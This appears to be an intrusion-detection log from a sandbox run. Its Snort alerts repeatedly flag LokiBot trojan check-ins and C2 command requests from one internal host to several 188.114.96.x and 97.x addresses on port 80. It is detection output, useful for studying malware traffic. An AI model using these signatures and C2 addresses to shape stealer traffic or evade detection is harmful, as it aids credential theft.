Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49172 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49173 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49173 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49173 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49173 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49173 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49174 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49174 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49174 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49174 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49174 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49175 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49175 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49175 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49175 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49175 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49176 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49176 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49176 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49176 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49176 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49177 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49177 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49177 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49177 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49177 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49178 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49178 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49178 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49178 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49178 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49179 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49179 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49179 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49179 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49179 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49180 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49180 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49180 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49180 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49180 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49181 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49181 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49181 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49181 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49181 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49182 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49182 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49182 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49182 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49182 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49183 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49183 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49183 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49183 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49183 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49184 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49184 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49184 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49184 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49184 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49185 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49185 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49185 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49185 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49185 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49186 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49186 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49186 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49186 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49186 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49187 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49187 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49187 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49187 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49187 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49188 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49188 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49188 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49188 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49188 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49189 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49189 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49189 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49189 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49189 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49190 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49190 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49190 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49190 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49190 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49191 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49191 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49191 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49191 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49191 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49192 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49192 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49192 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49192 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49192 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49193 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49193 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49193 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49193 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49193 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49194 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49194 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49194 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49194 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49194 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49195 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49195 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49195 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49195 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49195 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49196 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49196 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49196 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49196 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49196 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49197 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49197 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49197 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49197 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49197 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49198 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49198 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49198 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49198 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49198 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49199 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49199 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49199 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49199 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49199 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49200 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49200 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49200 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49200 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49200 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49201 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49201 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49201 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49201 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49201 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49202 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49202 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49202 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49202 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49202 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49203 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49203 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49203 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49203 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49203 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49204 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49204 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49204 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49204 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49204 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49205 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49205 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49205 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49205 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49205 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49206 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49206 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49206 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49206 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49206 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49207 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49207 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49207 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49207 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49207 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49208 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49208 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49208 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49208 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49208 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49209 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49209 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49209 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49209 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49209 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49210 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49210 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49210 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49210 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49210 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49211 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49211 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49211 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49211 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49211 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49212 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49212 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49212 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49212 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49212 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49213 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49213 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49213 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49213 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49213 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49214 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49214 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49214 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49214 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49214 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49215 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49215 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49215 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49215 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49215 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49216 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49216 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49216 -> 188.114.97.3:80
